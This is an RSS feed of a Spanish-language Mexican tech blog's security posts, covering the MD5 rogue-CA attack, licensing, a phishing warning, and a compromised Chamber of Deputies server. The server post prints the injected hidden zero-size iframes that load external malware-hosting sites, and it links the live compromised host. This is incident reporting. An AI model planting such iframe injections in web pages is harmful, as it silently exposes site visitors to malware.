<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>MasioIT &#187; seguridad</title>
	<atom:link href="http://www.masio.com.mx/category/seguridad/feed" rel="self" type="application/rss+xml" />
	<link>http://www.masio.com.mx</link>
	<description>Tecnología e Información</description>
	<lastBuildDate>Sun, 06 Feb 2011 17:23:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>HTTPS y SSL ya no pueden ser considerados seguros</title>
		<link>http://www.masio.com.mx/https-y-ssl-ya-no-pueden-ser-considerados-seguros</link>
		<comments>http://www.masio.com.mx/https-y-ssl-ya-no-pueden-ser-considerados-seguros#comments</comments>
		<pubDate>Tue, 30 Dec 2008 20:57:23 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[actualidad]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/?p=481</guid>
		<description><![CDATA[El día de hoy podría marcar un hito en la historia de la seguridad en Internet. Por primera vez se ha descubierto una &#8220;vulnerabilidad&#8221; que de ser explotada podría poner al comercio y a Internet de cabeza. En un trabajo realizado por diversos investigadores y presentado el dia de hoy, hace unos minutos. en la [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/si-ser-programador-fuera-como-ser-controlador-de-trafico-areo' rel='bookmark' title='Si ser programador fuera como ser controlador de trafico aereo'>Si ser programador fuera como ser controlador de trafico aereo</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>El día de hoy podría marcar un hito en la historia de la seguridad en Internet. Por primera vez se ha descubierto una &#8220;vulnerabilidad&#8221; que de ser explotada podría poner al comercio y a Internet de cabeza.</p>
<p>En un trabajo realizado por diversos investigadores y presentado el dia de hoy, hace unos minutos. en la &#8221; 25th Chaos Communication Congress&#8221;, investigadores de diversos lugares del mundo presentaron la conferencia &#8220;<a href="http://www.win.tue.nl/hashclash/rogue-ca/">MD5 considered harmful today</a>&#8221; en la cual presentaron un metodo mediante el cual pueden generar certificados <a href="http://en.wikipedia.org/wiki/Certificate_authority">CA</a> validos, con lo cual podrian generar un certificado <a href="http://en.wikipedia.org/wiki/SSL">SSL</a> para cualquier pagina, lo que implicaría que ninguna pagina HTTPS podría ser considerada como autentica o segura, lo cual afectaría seriamente a las actividades financieras por Internet.</p>
<p>El ataque, aunque no esta al alcance de todos, podría ser posible para ciertos laboratorios, gobiernos o criminales que controlen &#8220;botnets&#8221;.</p>
<p>Como dato curioso, los investigadores hicieron uso del <a href="http://www.win.tue.nl/~bdeweger/PS3Lab/">Playstation3Lab</a>, que les proporciono un cluster con mas de 200 PS3 interconectados actuando como una sola maquina.</p>
<p style="text-align: center;"><img class="size-medium wp-image-482 aligncenter" title="ps3cluster" src="http://www.masio.com.mx/masio/wp-content/uploads/2008/12/ps3cluster-225x300.png" alt="ps3cluster" width="225" height="300" /></p>
<p>Los usuarios ahora no pueden prevenir este ataque. La prevención de este ataque esta en manos de las autoridades certificadoras (CA) y si acaso, tal vez, del trabajo en conjunto de los creadores de navegadores. Sin embargo, una solución definitiva tomara tiempo, ya que se tendrían que reemplazar los certificados emitidos hasta el día de hoy que contengan las características vulnerables.</p>
<p>El papel apenas fue presentado el dia de hoy, hace algunos minutos y no se sabe aun de algun intento de explotarla en el pasado por algún otro investigador o criminal, aunque es improbable que esto sea, por la magnitud de esfuerzo necesaria para replicarla.</p>
<p>Puedes ver una prueba de concepto en:</p>
<p><a href="https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/">https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/</a></p>
<p>Para verificarla tienes que poner la fecha de tu computadora anterior a agosto de 2004.<br />
Hay mas información en la pagina de los investigadores: <a href="http://www.phreedom.org/research/rogue-ca/">http://www.phreedom.org/research/rogue-ca/<br />
</a></p>
<p>Detalles técnicos, debajo de esta linea. Si no te interesan, puedes dejar de leer aqui.</p>
<p><strong>Update: </strong></p>
<p>Microsoft ya <a href="http://www.microsoft.com/technet/security/advisory/961509.mspx">respondio</a> a este aviso diciendo que no se conocen ataques a MD5, por lo que no se planea hacer nada. Y que como no hay exploit disponible, pues todo esta super. Dios nos agarre confesados.</p>
<hr />La vulnerabilidad explota la debilidad de <a href="http://en.wikipedia.org/wiki/Md5">MD5</a> como función criptográfica, la cual se sabe ya desde hace tiempo (por lo menos desde 2004) que es débil y susceptible a ataques, por lo que se ha sugerido que se deje de usar para propósitos de seguridad.</p>
<p>Este ataque, mas concretamente, ataca la PKI (public key infraestructure), que es uno de los pilares de la confianza de los sitios seguros.</p>
<p>El problema se encontró en algunos CA los cuales generan certificados con MD5, encontrando colisiones en los hash generados. Gracias a esto ellos pudieron generar un certificado CA, con el cual se pueden generar certificados idénticos a los que usaría cualquier pagina que use HTTPS.</p>
<p>HTTPS y SSL funciona mediante una cadena de confianza. El root CA delega la confianza a los  CA intermedios y a su vez, los usuarios confían estos CA.  Dado que los navegadores comprueban la autenticidad de estos verificando contra los CA intermedios, el navegador no podría distinguir entre un certificado original y uno falso, ya que, en esencia, serian iguales.</p>
<div id="attachment_485" class="wp-caption aligncenter" style="width: 160px"><a href="http://www.masio.com.mx/wp-content/uploads/2008/12/attack.png"><img class="size-thumbnail wp-image-485" title="attack" src="http://www.masio.com.mx/masio/wp-content/uploads/2008/12/attack-150x150.png" alt="attack" width="150" height="150" /></a><p class="wp-caption-text">diagrama del ataque</p></div>
<p>El peligro de esta vulnerabilidad es que se podría conjuntar con otras vulnerabilidades, como la anunciada por <a href="http://www.snort.org/vrt/docs/white_papers/DNS_Vulnerability.pdf">Dan Kaminsky</a>[PDF] sobre el DNS poisoning, con lo cual se podría clonar cualquier pagina segura sin posibilidad de verificar si es segura o no. Ademas podría tener otras implicaciones no previstas, lo cual podremos ver, seguramente, en un futuro.</p>
<p>Como verificar si tu certificado es susceptible de ser vulnerable?</p>
<p>Entra pagina y ve los detalles del certificado. En la parte de algoritmo si hace mención a &#8220;MD5&#8243;, entonces si es vulnerable a este ataque.</p>
<div id="attachment_487" class="wp-caption aligncenter" style="width: 301px"><a href="http://www.masio.com.mx/wp-content/uploads/2008/12/certificado.png"><img class="size-medium wp-image-487" title="certificado" src="http://www.masio.com.mx/masio/wp-content/uploads/2008/12/certificado-291x300.png" alt="Detalles del certificado - Algoritmo" width="291" height="300" /></a><p class="wp-caption-text">Detalles del certificado - Algoritmo</p></div>
<p>Para detalles aún más técnicos, ve el <a href="http://www.win.tue.nl/hashclash/rogue-ca/">papel original</a>. El equipo de investigadores menciona que el papel aun no esta terminado, pero debera estar disponible en la primer mitad del proximo año.</p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/si-ser-programador-fuera-como-ser-controlador-de-trafico-areo' rel='bookmark' title='Si ser programador fuera como ser controlador de trafico aereo'>Si ser programador fuera como ser controlador de trafico aereo</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/https-y-ssl-ya-no-pueden-ser-considerados-seguros/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Servidor de la C&#225;mara de diputados distribuye Malware</title>
		<link>http://www.masio.com.mx/servidor-de-la-cmara-de-diputados-distribuye-malware</link>
		<comments>http://www.masio.com.mx/servidor-de-la-cmara-de-diputados-distribuye-malware#comments</comments>
		<pubDate>Fri, 15 Feb 2008 20:38:23 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[actualidad]]></category>
		<category><![CDATA[mexico]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/servidor-de-la-cmara-de-diputados-distribuye-malware/</guid>
		<description><![CDATA[No, no es esa otra noticia, donde un niño de 14 años les cambio la portada a la pagina de la cámara de  diputados. Ni tampoco esa noticia donde guardaban porno y lo ponían disponible a quien lo quisiera bajar. Ni tampoco esa otra donde exponían el archivo shadow (de usuarios y contraseñas de unix) [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/primeras-imagenes-del-usb-30-reveladas' rel='bookmark' title='Primeras imagenes del USB 3.0 reveladas'>Primeras imagenes del USB 3.0 reveladas</a></li>
<li><a href='http://www.masio.com.mx/wtf-imss' rel='bookmark' title='Un WTF en el sistema de control del IMSS'>Un WTF en el sistema de control del IMSS</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>No, no es esa otra noticia, donde un niño de 14 años <a href="http://www.eluniversal.com.mx/notas/482357.html">les cambio la portada a la pagina de la cámara de  diputados</a>. Ni tampoco esa <a href="http://g30rg3x.com/2007/02/01/diputadosgobmx-%c2%bfhackeados-por-google/">noticia donde guardaban porno</a> y lo ponían disponible a quien lo quisiera bajar. Ni tampoco esa otra donde <a href="http://www.enchilame.com/story/diputados-la-saga-continua">exponían el archivo shadow</a> (de usuarios y contraseñas de unix) directo para quien lo quiera ver en la cámara de diputados.</p>
<p>Esta es otra historia diferente.</p>
<p>Después  leer la noticia del chamaco de 14 años, y de 5 minutos de investigación, encontré que la cámara de diputados tiene un servidor publico en el que muy alegremente distribuyen Malware.</p>
<p>Para los que lo quieran ver, y mientras dure, el servidor es este:</p>
<p>http://pac.diputados.gob.mx</p>
<p>Advertencia: Les recomiendo que visiten la pagina con firefox, noscript y antivirus instalado. O con Linux <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . De lo contrario podrían convertirse en zombies y un cachorro morirá. (La parte de los zombies es cierta <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</p>
<p>La pagina tiene el siguiente código:</p>
<p style="border: 1px solid gray; margin: 20px 0px 10px; padding: 4px; overflow: auto; font-size: 8pt; width: 97.5%; cursor: text; max-height: 200px; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4">
<p style="border-style: none; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4">
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white"><span style="color: #606060">   1:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://www.bsupport.clara.net/cgi/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4"><span style="color: #606060">   2:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://oscentolos.com/cgi/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white"><span style="color: #606060">   3:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://thatsentertainmentinoz.com.au/log/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4"><span style="color: #606060">   4:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://www.kawaart.com/cgi/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white"><span style="color: #606060">   5:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://www.lindomar.com.br/cgi/index.html"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4"><span style="color: #606060">   6:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://www.youtube.com/watch?v=jTah9ckvV3Y"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white"><span style="color: #606060">   7:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://mavideniz1.org/forum/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4"><span style="color: #606060">   8:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://siyamiozkan.com.tr/forum"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white"><span style="color: #606060">   9:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://mavi1.org/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4"><span style="color: #606060">  10:</span> <span style="color: #0000ff">&lt;</span><span style="color: #800000">iframe</span> <span style="color: #ff0000">src</span><span style="color: #0000ff">="http://mavideniz1.org/"</span> <span style="color: #ff0000">frameborder</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">width</span><span style="color: #0000ff">="0"</span> <span style="color: #ff0000">height</span><span style="color: #0000ff">="0"</span><span style="color: #0000ff">&gt;&lt;/</span><span style="color: #800000">iframe</span><span style="color: #0000ff">&gt;</span></pre>
<p>Algunos de esos sitios distribuyen malware.</p>
<p>Llama la atención que también hacen links a un vídeo de youtube. Al mostrar el vídeo queda claro quien fue el  responsable del <em>deface</em>. Al parecer el responsable fue iskorpitx un hacker turco que se hizo famoso tras un  <a href="http://www.kriptopolis.org/un-turco-piratea-miles-de-sitios-web">incidente con miles de servidores.</a></p>
<p>Lo preocupante del asunto es que una vez que se tiene acceso a un servidor, se puede crear una reacción en cadena y tener acceso a los demás servidores de la red de la cámara de diputados. Y dada la laxa seguridad y control que tienen sobre su red, no dudaría que varios de estos servidores sean controlados por gente ajena a la administración.</p>
<p>Y tal vez este deface sea el menor de sus problemas, cuando su servidor DNS esta exponiendo toda la zona a quien quiera verla.  Es decir, con un simple comando en la consola tu puedes obtener la lista de todos sus servidores públicos.</p>
<p>Y ya ni hablar de que tienen una <a href="http://phpmyadmin.diputados.gob.mx/">versión vieja</a> (y vulnerable) de su software de acceso a su base de datos, visible para todo el publico (debo aceptar que cuando vi esto, mi palma dio una rapida visita a mi frente).</p>
<p align="center"><a href="http://www.masio.com.mx/wp-content/uploads/2008/02/pantallazo-phpmyadmin-2.10.1-minefield.png"><img src="http://www.masio.com.mx/wp-content/uploads/2008/02/pantallazo-phpmyadmin-2.10.1-minefield-thumb.png" style="border: 0px none " alt="Pantallazo-phpMyAdmin 2.10.1 - Minefield" border="0" height="234" width="244" /></a></p>
<p>Es lamentable y preocupante como se lleva la política de administración de estos servidores. Mas preocupante aun cuando el responsable de esto asegura que su seguridad es &#8220;estable&#8221; y que <a href="http://www.eluniversal.com.mx/notas/482410.html">el problema no existe</a>.</p>
<p>Cuando se es incapaz de ver el problema, es imposible arreglarlo. Casos como estos se seguirán repitiendo. Todo, pagado por nuestros impuestos.</p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/primeras-imagenes-del-usb-30-reveladas' rel='bookmark' title='Primeras imagenes del USB 3.0 reveladas'>Primeras imagenes del USB 3.0 reveladas</a></li>
<li><a href='http://www.masio.com.mx/wtf-imss' rel='bookmark' title='Un WTF en el sistema de control del IMSS'>Un WTF en el sistema de control del IMSS</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/servidor-de-la-cmara-de-diputados-distribuye-malware/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Eres programador independiente? Licencia tu trabajo</title>
		<link>http://www.masio.com.mx/eres-programador-independiente-licencia-tu-trabajo</link>
		<comments>http://www.masio.com.mx/eres-programador-independiente-licencia-tu-trabajo#comments</comments>
		<pubDate>Mon, 17 Dec 2007 22:44:20 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[seguridad]]></category>
		<category><![CDATA[software libre]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/eres-programador-independiente-licencia-tu-trabajo/</guid>
		<description><![CDATA[Pues eso, lo que dice el titulo de la entrada. Si eres un programador independiente (o un programador en general, en realidad) siempre, siempre siempre, incluye una licencia en tu trabajo, no importa que sea un peque&#241;o pedazo de c&#243;digo que publicaste en tu&#160; blog, o una trabajo open source. Puedes escoger mil y un [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/si-ser-programador-fuera-como-ser-controlador-de-trafico-areo' rel='bookmark' title='Si ser programador fuera como ser controlador de trafico aereo'>Si ser programador fuera como ser controlador de trafico aereo</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.masio.com.mx/wp-content/uploads/2007/12/535px-heckert-gnu-white.svg_.png"><img style="border-top-width: 0px; border-left-width: 0px; border-bottom-width: 0px; margin: 5px; border-right-width: 0px" height="151" alt="535px-Heckert_GNU_white.svg" src="http://www.masio.com.mx/wp-content/uploads/2007/12/535px-heckert-gnu-white.svg-thumb.png" width="154" align="right" border="0" /></a> Pues eso, lo que dice el titulo de la entrada. Si eres un programador independiente (o un programador en general, en realidad) siempre, siempre siempre, incluye una licencia en tu trabajo, no importa que sea un peque&#241;o pedazo de c&#243;digo que publicaste en tu&#160; blog, o una trabajo open source. </p>
<p>Puedes escoger mil y un licencias, seguramente habr&#225; una que se adapte a lo que tu quieras.</p>
<p>Esto viene a colaci&#243;n por un caso que ha pasado &#250;ltimamente y que ha llamado la atenci&#243;n de los medios especializados.</p>
<p><a href="http://www.getpaint.net/">Paint.net</a> es un programa open source para edici&#243;n de im&#225;genes en windows. Cabe decir que es un muy buen paquete y muy sencillo de usar. Yo lo uso cotidianamente. Pues resulta que un programador&#160; tomo el c&#243;digo fuente de Paint.Net, le borr&#243; las licencias, le cambio el nombre y se puso el como autor para comercializar el producto.</p>
<p>Cuando el autor original se enter&#243;, <a href="http://blog.getpaint.net/2007/12/04/freeware-authors-beware-of-%E2%80%9Cbackspaceware%E2%80%9D/">se arm&#243; toda una telenovela</a>. Entre otras cosas, decidi&#243; que cerrar&#237;a (al menos en parte) el c&#243;digo para evitar futuros robos. El programador que copio el c&#243;digo es ya un viejo veterano en robo de c&#243;digo. Inclusive intento hacer pasar <a href="http://youfailit.net/?p=50">Doom como suyo</a> (<a href="http://youfailit.net/?p=49">aqu&#237; la saga completa</a>).En su pagina (http://www.ultra-software.com/MyProducts.html, no a&#241;ado link para no ayudarle <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ) tiene otras joyitas de trabajos que intento hacer pasar por suyos. </p>
<p>Estos casos son muy comunes en el ambiente del software libre, por lo que repito y recomiendo: Escoge una licencia. Hay muchas para escoger, entre otras:</p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/GNU_General_Public_License">GNU General Public License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/Apache_License">Apache License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/Open_Software_License">Open Software License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/PHP_License">PHP License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/BSD_license">BSD License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/MIT_license">MIT License</a> </li>
<li><a href="http://en.wikipedia.org/wiki/Mozilla_Public_License">Mozilla public license</a> </li>
<li><a href="http://en.wikipedia.org/wiki/GNU_Lesser_General_Public_License">GNU Lesser General Public License</a> </li>
</ul>
<p>Sin esto, no podr&#225;s defender tu trabajo. Cada una de estas licencias tiene su sus caracter&#237;sticas propias. Por ejemplo la licencia MIT permite rehusar el c&#243;digo fuente en software propietario mientras se conserve la atribuci&#243;n, mientras que la GPL necesita que se revele el c&#243;digo fuente del software derivado. Cada licencia tiene sus propios t&#233;rminos, por lo que te recomiendo que leas e investigues al respecto.</p>
<p>En caso de que encuentres que tu software esta siendo mal usado, lo primero que debes hacer es pedir de manera formal que tu software sea usado en t&#233;rminos diferentes a los que tu deseas. </p>
<p>En caso de que no se cumpla, puedes demandar y pedir compensaci&#243;n y muy probablemente, tienes las de ganar. La <a href="http://en.wikipedia.org/wiki/GPL#The_GPL_in_court">GPL tiene muy buen registro</a> en casos de violaciones al uso de la licencia. De hecho acaba de ganar <a href="http://www.softwarefreedom.org/news/2007/dec/17/busybox-xterasys-settlement/">un caso a favor</a> de los desarrolladores de <a href="http://www.busybox.net/">BusyBox</a>, una herramienta de l&#237;nea de de comandos.</p>
<p>En cualquier caso, deber&#225;s asesorarte con un abogado para verificar los detalles. Tambi&#233;n te puedes acercar a la <a href="http://www.softwarefreedom.org/services/">Software Freedom Law Center y ellos te pueden asesorar e incluso defender</a> si la situaci&#243;n lo amerita.</p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/si-ser-programador-fuera-como-ser-controlador-de-trafico-areo' rel='bookmark' title='Si ser programador fuera como ser controlador de trafico aereo'>Si ser programador fuera como ser controlador de trafico aereo</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/eres-programador-independiente-licencia-tu-trabajo/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>No te registres a nipper.com.mx</title>
		<link>http://www.masio.com.mx/no-te-registres-a-nippercommx</link>
		<comments>http://www.masio.com.mx/no-te-registres-a-nippercommx#comments</comments>
		<pubDate>Fri, 07 Dec 2007 23:05:31 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[actualidad]]></category>
		<category><![CDATA[mexico]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/no-te-registres-a-nippercommx/</guid>
		<description><![CDATA[Ultimamente hay muchos anuncios en la television de nipper.com.mx, intentando crear una publicidad viral o algo asi. Mi recomendacion es, por el momento, no te registres. Su sitio tiene serios (a.k.a. de novato) problemas de seguridad. Tus datos podrian ser robados. Especialmente porque sera una plataforma de medios de pagos electronicos. Mas info aqui: http://www.fimpe.org.mx/), [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/citizendium-abre-sus-puertas' rel='bookmark' title='Citizendium abre sus puertas'>Citizendium abre sus puertas</a></li>
<li><a href='http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico' rel='bookmark' title='Robo de cuentas bancarias y el status en mexico'>Robo de cuentas bancarias y el status en mexico</a></li>
<li><a href='http://www.masio.com.mx/los-mejores-lugares-para-trabajar-en-mexico' rel='bookmark' title='Los mejores lugares para trabajar en mexico'>Los mejores lugares para trabajar en mexico</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ultimamente hay muchos anuncios en la television de nipper.com.mx, intentando crear una publicidad viral o algo asi.</p>
<p>Mi recomendacion es, por el momento, no te registres. Su sitio tiene serios (a.k.a. de novato) problemas de seguridad. Tus datos podrian ser robados. Especialmente porque sera una plataforma de medios de pagos electronicos. Mas info aqui: <a href="http://www.fimpe.org.mx/">http://www.fimpe.org.mx/</a>), especificamente aqui: <a href="http://www.fimpe.org.mx/pagos.html">http://www.fimpe.org.mx/pagos.html</a></p>
<p>Por cierto, alguien tiene su contacto? Los he intentado contactar, pero en su pagina no tienen informacion de contacto. YA intente con los de hola-tu.com que por lo menos, estan relacionados (Los dns de nipper.com.mx son los de hola-tu), pero sigo esperando.</p>
<p>Este post se borrara (o por lo menos actualizara) en cuanto pueda contactarlos y corrijan esos problemas de seguridad.</p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/citizendium-abre-sus-puertas' rel='bookmark' title='Citizendium abre sus puertas'>Citizendium abre sus puertas</a></li>
<li><a href='http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico' rel='bookmark' title='Robo de cuentas bancarias y el status en mexico'>Robo de cuentas bancarias y el status en mexico</a></li>
<li><a href='http://www.masio.com.mx/los-mejores-lugares-para-trabajar-en-mexico' rel='bookmark' title='Los mejores lugares para trabajar en mexico'>Los mejores lugares para trabajar en mexico</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/no-te-registres-a-nippercommx/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Nuevo tipo de phishing ataca a clientes de Prodigy Infinitum</title>
		<link>http://www.masio.com.mx/nuevo-tipo-de-phishing-ataca-a-clientes-de-prodigy-infinitum</link>
		<comments>http://www.masio.com.mx/nuevo-tipo-de-phishing-ataca-a-clientes-de-prodigy-infinitum#comments</comments>
		<pubDate>Thu, 22 Nov 2007 15:33:17 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/nuevo-tipo-de-phishing-ataca-a-clientes-de-prodigy-infinitum/</guid>
		<description><![CDATA[El dia de ayer recibi un correo de phising con una tarjeta de gusanito.com. Esto no seria nada sorprendente si no fuera por el nuevo metodo que estas personas estan utilizando. Al hacer clic en el link fraudulento, me llevaba a una pagina de lo que parecia ser una tarjeta de gusanito.com comun y corriente. [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<p>El dia de ayer recibi un correo de phising con una tarjeta de gusanito.com. Esto no seria nada sorprendente si no fuera por el nuevo metodo que estas personas estan utilizando.</p>
<p>Al hacer clic en el link fraudulento, me llevaba a una pagina de lo que parecia ser una tarjeta de gusanito.com comun y corriente. Al revisar el codigo tenia unas lineas similares a estas (detalles peligrosos omitidos)</p>
<p>&nbsp;</p>
